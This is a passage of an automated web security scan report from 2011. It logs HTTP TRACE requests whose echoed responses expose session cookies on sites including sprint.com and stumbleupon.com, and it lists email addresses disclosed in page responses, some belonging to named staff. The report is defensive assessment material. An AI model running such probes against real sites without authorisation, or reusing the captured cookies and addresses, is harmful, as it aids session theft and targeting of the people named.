TRACE / HTTP/1.0
Cookie: f8dfd632d533e9de
Host: search.spotxchange.com

23.21. http://shop.sprint.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://shop.sprint.com
Path:	/

Request

TRACE / HTTP/1.0
Host: shop.sprint.com
Cookie: aa829a4429c34dba

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:23:55 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: shop.sprint.com
Cookie: aa829a4429c34dba; JSESSIONID=A04BDCEBB4F1F4B037F7C60B1DAAC0CB.shop41; TLisset=true; naf=userSeg~Interstitial Home Page; mbox=check#true#1315097121|session#1315097027971-178294#1315098921|disable#browser%20timeout#1315
...[SNIP]...

23.22. http://tacoda.at.atwola.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tacoda.at.atwola.com
Path:	/

Request

TRACE / HTTP/1.0
Host: tacoda.at.atwola.com
Cookie: 8b4fd72c80730422

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:06:14 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Connection: Keep-Alive
Cookie: 8b4fd72c80730422; ANRTT=; TData=99999|^; eadx=x; N=2:b2269f69029173967deb3f16e3a72f92,b2269f69029173967deb3f16e3a72f92; Tsid=0^1315097086^1315100173|17778^1315097086^1315100173; ATTACID=a3Z0aWQ9MTc2NWlmdTFha2tjNzk=; A
...[SNIP]...

23.23. http://tap.rubiconproject.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tap.rubiconproject.com
Path:	/

Request

TRACE / HTTP/1.0
Host: tap.rubiconproject.com
Cookie: b537cc40e6bf5fd1

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:24:34 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: tap.rubiconproject.com
Cookie: b537cc40e6bf5fd1; SERVERID=; dq=2|2|0|0; put_1994=vf1kj11kp2en; ruid=154e62c97432177b6a4bcd01^1^1315096948^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGD
...[SNIP]...

23.24. http://www.greenbiz.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.greenbiz.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.greenbiz.com
Cookie: 45467ffa69412153

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 01:26:13 GMT
Server: Apache/2.2.15 (EL)
Content-Type: message/http
X-Cache: MISS from localhost
X-Cache-Lookup: NONE from localhost:80
Via: 1.0 localhost:80 (squid/2.6.STABLE21)
Connection: close

TRACE / HTTP/1.0
Host: www.greenbiz.com
Cookie: 45467ffa69412153; SESS2ef9f5808487e67fd7f5219ff19dc8d5=aosfnbumpo2nii8et452rk3r20
Via: 1.0 localhost:80 (squid/2.6.STABLE21)
X-Forwarded-For: 50.23.123.106
Cache-Control: max-age=259200

23.25. http://www.idg.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.idg.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.idg.com
Cookie: bad13e9b08c13128

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Sun, 04 Sep 2011 01:26:15 GMT
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Expires: Sun, 04 Sep 2011 01:26:15 GMT
Content-Type: message/http
Content-Length: 63

TRACE / HTTP/1.0
Host: www.idg.com
Cookie: bad13e9b08c13128

23.26. http://www.newslibrary.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.newslibrary.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.newslibrary.com
Cookie: e01c4eaa80d0886b

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:26:24 GMT
Server: Apache/1.3.26 (Unix) mod_gzip/1.3.26.1a mod_wsgi/1.0 Python/2.5.1 ApacheJServ/1.1.2 mod_jk/1.2.23
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: e01c4eaa80d0886b; ARCH_HOST=nl.newsbank.com
Host: www.newslibrary.com

23.27. http://www.outbrain.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.outbrain.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.outbrain.com
Cookie: 6835c5cdf7a4d06e

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:26:24 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.outbrain.com
Cookie: 6835c5cdf7a4d06e; JSESSIONID=C113375F2DFAFC327F82A45EE5DD9DE1; obuid=7a957d2b-640c-464a-8acd-8219f3607c99; _lvs2="RifDljbBnUo="; _lvd2="a20VgmTZEaeQlaVAQ/tI3Q=="; _rcc2="/RlY4kI4x+EC5hF25OSb5Q=="; recs-854b02c66246fc9
...[SNIP]...

23.28. http://www.sprint.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sprint.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.sprint.com
Cookie: e08796ab1b345144

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:10:30 GMT
Server: Apache/2.2.14 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.sprint.com
Cookie: e08796ab1b345144; Apache=50.23.123.106.1315095419850930; TLisset=true; naf=userSeg~Interstitial Home Page; mbox=check#true#1315097121|session#1315097027971-178294#1315098921|disable#browser%20timeout#1315100658; s_cc=
...[SNIP]...

23.29. https://www.sprint.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.sprint.net
Path:	/

Request

TRACE / HTTP/1.0
Host: www.sprint.net
Cookie: 73a267d793e96c76

Response

HTTP/1.1 200 OK
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 01:01:50 GMT
Server: Apache/2.2.4 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Client-IP: 50.23.123.106
Host: www.sprint.net
Cookie: 73a267d793e96c76; ServerID=1125

23.30. http://www.stumbleupon.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stumbleupon.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.stumbleupon.com
Cookie: 515e18fc0bea21e2

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Host
Content-Type: message/http
Content-Length: 415
Date: Sun, 04 Sep 2011 01:27:58 GMT
Age: 0
Via: 1.1 varnish
Connection: close

TRACE / HTTP/1.0
Cookie: 515e18fc0bea21e2; su_sid=ZkQhrIC5kRBW4N4C7gQ0mJBfe-9; cmf_i=18719310644e62cb03b4fa21.85125279; cmf_spr=A%2FN; cmf_sp=http%3A%2F%2Fwww.stumbleupon.com%2Fsubmit; su_c=7bc313f708d993657064a32892b775aa%7C%7C10%7C%7C131509
...[SNIP]...

24. Email addresses disclosed previous next
There are 27 instances of this issue:

http://cdn.echoenabled.com/clientapps/v2/stream.js
http://cdn.taboolasyndication.com/libtrc/reuters/rbox.en.4-8-2-1-48560.json
http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
http://i.usatoday.net/asp/uas3/uas.jquery.plugins.js
https://login.yahoo.com/config/login
http://media.charlotteobserver.com/static/scripts/mi/utility_lib.js
http://odb.outbrain.com/utils/get
https://subscriberservices.mcclatchy.com/char/transactiontype.asp
http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
http://www.charlotteobserver.com/advertising/index.html
http://www.freep.com/article/20110903/SPORTS07/109030443/Other-Michigan-State-athletes-fans-cheer-football
http://www.google.com/trends/hottrends
http://www.idg.com/www/rd.nsf/rd
http://www.latimes.com/sports/la-sp-0903-usc-charticle-20110903,0,2387944.story
http://www.newslibrary.com/nlsearch.asp
http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
http://www.sacbee.com/classified-ads/Obituaries%20&%20In%20Memoriams/classification/In%20Memoriams
http://www.sacbee.com/mr/b.gif
http://www.sacbee.com/mr/e.gif
http://www.sacbee.com/mr/f.gif
http://www.sacbee.com/reg-bin/int.cgi
http://www.sacbee.com/reg-bin/tint.cgi
http://www.sprint.com/assets/scripts/analytics/voc/surveyLogic.js
http://www.sprint.com/legal/agreement.html
http://www.sprint.com/legal/copyright.html
http://www.usatoday.com/marketing/feedback.htm
http://www.usatoday.com/marketing/questions.htm

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

24.1. http://cdn.echoenabled.com/clientapps/v2/stream.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.echoenabled.com
Path:	/clientapps/v2/stream.js

Issue detail

The following email address was disclosed in the response:

solutions@aboutecho.com

Request

GET /clientapps/v2/stream.js HTTP/1.1
Host: cdn.echoenabled.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: application/javascript
Age: 10588
Date: Sun, 04 Sep 2011 00:42:21 GMT
Last-Modified: Fri, 02 Sep 2011 23:49:33 GMT
Content-Length: 115232
Connection: keep-alive

...[SNIP]...
<solutions@aboutecho.com>
...[SNIP]...

24.2. http://cdn.taboolasyndication.com/libtrc/reuters/rbox.en.4-8-2-1-48560.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.taboolasyndication.com
Path:	/libtrc/reuters/rbox.en.4-8-2-1-48560.json

Issue detail

The following email address was disclosed in the response:

info@taboola.com

Request

GET /libtrc/reuters/rbox.en.4-8-2-1-48560.json HTTP/1.1
Host: cdn.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Sun, 04 Sep 2011 00:43:57 GMT
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding
Last-Modified: Thu, 25 Aug 2011 11:22:46 GMT
ETag: "3fd20-284-4ab52a5e8ad80"
Content-Language: en
Accept-Ranges: bytes
Cache-Control: private, max-age=31536000
Age: 825669
Expires: Fri, 24 Aug 2012 11:22:48 GMT
Content-Length: 644
Connection: Keep-Alive

trc_json_locale_data={"rbox":{"":{"MIME-Version":" 1.0","POT-Creation-Date":" 2009-06-03 19:30+0300","X-Poedit-SourceCharset":" utf-8","X-Poedit-Country":" ISRAEL","X-Poedit-Language":" Hebrew","Last-
...[SNIP]...
<info@taboola.com>
...[SNIP]...

24.3. http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://content.usatoday.com
Path:	/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1

Issue detail

The following email addresses were disclosed in the response:

accuracy@usatoday.com
letters@usatoday.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 00:42:13 GMT
Content-Length: 48884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns:pas="http://sitelifestage.usatoday.com/2009/pluckApplicationServer" xmlns:o
...[SNIP]...
<a href="mailto:accuracy@usatoday.com?subject=Blog: Stay updated on Oregon-LSU and other college football action&body=http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-
...[SNIP]...
<a href="mailto:letters@usatoday.com">letters@usatoday.com</a>
...[SNIP]...

24.4. http://i.usatoday.net/asp/uas3/uas.jquery.plugins.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://i.usatoday.net
Path:	/asp/uas3/uas.jquery.plugins.js

Issue detail

The following email address was disclosed in the response:

jack@colorpowered.com

Request

GET /asp/uas3/uas.jquery.plugins.js HTTP/1.1
Host: i.usatoday.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 06 Apr 2011 17:56:27 GMT
Accept-Ranges: bytes
ETag: "aaecccf383f4cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:42:19 GMT
Content-Length: 20271
Connection: close

// ColorBox v1.3.9 - a full featured, light-weight, customizable lightbox based on jQuery 1.3
// c) 2009 Jack Moore - www.colorpowered.com - jack@colorpowered.com
// Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
(function($,window){var defaults={transition:"elastic",speed:300,width:false,initialWidth:"600",innerWidth:false
...[SNIP]...

24.5. https://login.yahoo.com/config/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.yahoo.com
Path:	/config/login

Issue detail

The following email address was disclosed in the response:

free2rhyme@yahoo.com

Request

GET /config/login HTTP/1.1
Host: login.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:50 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
X-Frame-Options: DENY
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 49854

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Sign in
...[SNIP]...
<p id='ex'>(e.g. free2rhyme@yahoo.com)</p>
...[SNIP]...

24.6. http://media.charlotteobserver.com/static/scripts/mi/utility_lib.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.charlotteobserver.com
Path:	/static/scripts/mi/utility_lib.js

Issue detail

The following email address was disclosed in the response:

jwhetzel@mcclatchyinteractive.com

Request

GET /static/scripts/mi/utility_lib.js HTTP/1.1
Host: media.charlotteobserver.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 05 Sep 2008 19:38:33 GMT
ETag: "11687e2-3b7c-48c18ab9"
Vary: Accept-Encoding
Server: Apache/1.3.41
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 15228
Cache-Control: max-age=0
Expires: Sun, 04 Sep 2011 00:44:06 GMT
Date: Sun, 04 Sep 2011 00:44:06 GMT
Connection: close

/**
* @fileoverview A random collection of functions, classes and extensions to core
* Javascript objects.
*
* @author Joe Whetzel jwhetzel@mcclatchyinteractive.com
*************************************************************************** */

// extensions to the String object
String.prototype.append = function(str,del){
   var newStr = this;
   if (del) {
       if (n
...[SNIP]...

24.7. http://odb.outbrain.com/utils/get previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://odb.outbrain.com
Path:	/utils/get

Issue detail

The following email addresses were disclosed in the response:

feedback@outbrain.com
u003efeedback@outbrain.com

Request

Response

24.8. https://subscriberservices.mcclatchy.com/char/transactiontype.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://subscriberservices.mcclatchy.com
Path:	/char/transactiontype.asp

Issue detail

The following email addresses were disclosed in the response:

Matthew_Baird@wayfarer.com
taylor@wired.com

Request

GET /char/transactiontype.asp HTTP/1.1
Host: subscriberservices.mcclatchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 01:24:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 15086
Content-Type: text/html
Cache-control: private

<html>
<head>
<LINK rel="stylesheet" type="text/css" href="SSheet1.css">
<TITLE></TITLE>
<script LANGUAGE="JavaScript">
function WM_netscapeCssFix()
{
/*
Source: Webmonkey Code Library
(http://www.hotwired.com/webmonkey/javascript/code_library/)

Author: Taylor
Author Email: taylor@wired.com
Author URL: http://www.taylor.org/
*/

// This part was inspired by Matthew_Baird@wayfarer.com
// It gets around another unfortunate bug whereby Netscape
// fires a resize event when the scrollbars pop up. This
// checks to make sure that the window's available size
// has actual
...[SNIP]...

24.9. http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.charlotteobserver.com
Path:	/2011/09/03/2577566/raceday-danica-already-gone.html

Issue detail

The following email address was disclosed in the response:

jutter@charlotteobserver.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 110282
Expires: Sun, 04 Sep 2011 01:00:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:00:13 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://ogp.me/ns#">

...[SNIP]...
<br>jutter@charlotteobserver.com</div>
...[SNIP]...
<span class="org fn">
jutter@charlotteobserver.com
</span>
...[SNIP]...
/www.charlotteobserver.com/2011/09/03/2577566_raceday-danica-already-gone.html';
mistats.popstoryheadline='2577566|Raceday: Danica already gone?';
mistats.contentsource='charlotteobserver|Manual Entry|jutter@charlotteobserver.com|‬By Jim Utter‭';
mistats.pubdate='2011/09/03';
mistats.moddate='2011/09/03 H20';

-->
...[SNIP]...

24.10. http://www.charlotteobserver.com/advertising/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.charlotteobserver.com
Path:	/advertising/index.html

Issue detail

The following email addresses were disclosed in the response:

adevereaux@charlotteobserver.com
advertise@charlotteobserver.com
dfrank@charlotteobserver.com
drgordon@charlotteobserver.com
eirwin@charlotteobserver.com
jmarco@charlotteobserver.com
rstokes@charlotteobserver.com

Request

GET /advertising/index.html HTTP/1.1
Host: www.charlotteobserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Content-Type: text/html
Expires: Sun, 04 Sep 2011 01:25:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:25:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 91622

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://ogp.me/ns#">

...[SNIP]...
<a href="mailto:advertise@charlotteobserver.com">advertise@charlotteobserver.com</a>
...[SNIP]...
<a href="mailto:drgordon@charlotteobserver.com">
...[SNIP]...
<a href="mailto:dfrank@charlotteobserver.com">
...[SNIP]...
<a href="mailto:dfrank@charlotteobserver.com">dfrank@charlotteobserver.com</a>
...[SNIP]...
<a href="mailto:adevereaux@charlotteobserver.com">
...[SNIP]...
<a href="mailto:eirwin@charlotteobserver.com">
...[SNIP]...
<a href="mailto:drgordon@charlotteobserver.com">
...[SNIP]...
<a href="mailto:dfrank@charlotteobserver.com">
...[SNIP]...
<a href="mailto:jmarco@charlotteobserver.com">
...[SNIP]...
<a href="mailto:rstokes@charlotteobserver.com">
...[SNIP]...

24.11. http://www.freep.com/article/20110903/SPORTS07/109030443/Other-Michigan-State-athletes-fans-cheer-football previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freep.com
Path:	/article/20110903/SPORTS07/109030443/Other-Michigan-State-athletes-fans-cheer-football

Issue detail

The following email address was disclosed in the response:

feedback@outbrain.com

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Last-Modified: Sun, 04 Sep 2011 01:26:09 GMT
X-Processing-begin: MOC-WN0324, on site C4 (2011-09-03 21:26:09:818)
Content-Type: text/html
X-Processing-finished: MOC-WN0324, on site C4 (2011-09-03 21:26:09:943)
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 04 Sep 2011 01:26:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 181668

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:meebo="http://www.meebo.com" lang="en">

<head>
<title>Rokeyta Roberson: spar
...[SNIP]...
<a href='mailto:feedback@outbrain.com'>feedback@outbrain.com</a>
...[SNIP]...

24.12. http://www.google.com/trends/hottrends previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/trends/hottrends

Issue detail

The following email address was disclosed in the response:

nhayes@suntimes.com

Request

Response

24.13. http://www.idg.com/www/rd.nsf/rd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.idg.com
Path:	/www/rd.nsf/rd

Issue detail

The following email address was disclosed in the response:

questions@idg.com

Request

GET /www/rd.nsf/rd HTTP/1.1
Host: www.idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Sun, 04 Sep 2011 01:26:15 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5062
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<a href="mailto:questions@idg.com">
...[SNIP]...

24.14. http://www.latimes.com/sports/la-sp-0903-usc-charticle-20110903,0,2387944.story previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.latimes.com
Path:	/sports/la-sp-0903-usc-charticle-20110903,0,2387944.story

Issue detail

The following email address was disclosed in the response:

gary.klein@latimes.com

Request

Response

24.15. http://www.newslibrary.com/nlsearch.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.newslibrary.com
Path:	/nlsearch.asp

Issue detail

The following email address was disclosed in the response:

newslibrary@newsbank.com

Request

GET /nlsearch.asp HTTP/1.1
Host: www.newslibrary.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.16. http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sacbee.com
Path:	/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html

Issue detail

The following email address was disclosed in the response:

feedback@sacbee.com

Request

Response

24.17. http://www.sacbee.com/classified-ads/Obituaries%20&%20In%20Memoriams/classification/In%20Memoriams previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sacbee.com
Path:	/classified-ads/Obituaries%20&%20In%20Memoriams/classification/In%20Memoriams

Issue detail

The following email addresses were disclosed in the response:

cobrandedsites@cars.com
feedback@sacbee.com

Request

Response

24.18. http://www.sacbee.com/mr/b.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sacbee.com
Path:	/mr/b.gif

Issue detail

The following email address was disclosed in the response:

feedback@sacbee.com

Request

GET /mr/b.gif HTTP/1.1
Host: www.sacbee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.19. http://www.sacbee.com/mr/e.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sacbee.com
Path:	/mr/e.gif

Issue detail

The following email address was disclosed in the response:

feedback@sacbee.com

Request

GET /mr/e.gif HTTP/1.1
Host: www.sacbee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.20. http://www.sacbee.com/mr/f.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sacbee.com
Path:	/mr/f.gif

Issue detail

The following email address was disclosed in the response:

feedback@sacbee.com

Request

GET /mr/f.gif HTTP/1.1
Host: www.sacbee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.21. http://www.sacbee.com/reg-bin/int.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sacbee.com
Path:	/reg-bin/int.cgi

Issue detail

The following email addresses were disclosed in the response:

content@www.sacbee.com
feedback@sacbee.com
you@yahoo.com

Request

GET /reg-bin/int.cgi HTTP/1.1
Host: www.sacbee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Mi-app-host: rdds020p
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 04 Sep 2011 01:27:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:27:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120521

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<SCRIPT LANGUAGE="JavaScript">
<!--
var gomez={
gs: new
...[SNIP]...
<a href="mailto:feedback@sacbee.com">
...[SNIP]...
<span class="exmpl">ex: "you@yahoo.com"</span>
...[SNIP]...
<p>To register a complaint about another user's conduct, please send an e-mail message to content@www.sacbee.com, or write to Customer Service, www.sacbee.com, [-YOUR_ADDRESS-].</p>
...[SNIP]...
<a href="mailto:feedback@sacbee.com">
...[SNIP]...

24.22. http://www.sacbee.com/reg-bin/tint.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sacbee.com
Path:	/reg-bin/tint.cgi

Issue detail

The following email address was disclosed in the response:

feedback@sacbee.com

Request

GET /reg-bin/tint.cgi HTTP/1.1
Host: www.sacbee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.23. http://www.sprint.com/assets/scripts/analytics/voc/surveyLogic.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sprint.com
Path:	/assets/scripts/analytics/voc/surveyLogic.js

Issue detail

The following email address was disclosed in the response:

jasone@numericanalytics.com

Request

GET /assets/scripts/analytics/voc/surveyLogic.js HTTP/1.1
Host: www.sprint.com
Proxy-Connection: keep-alive
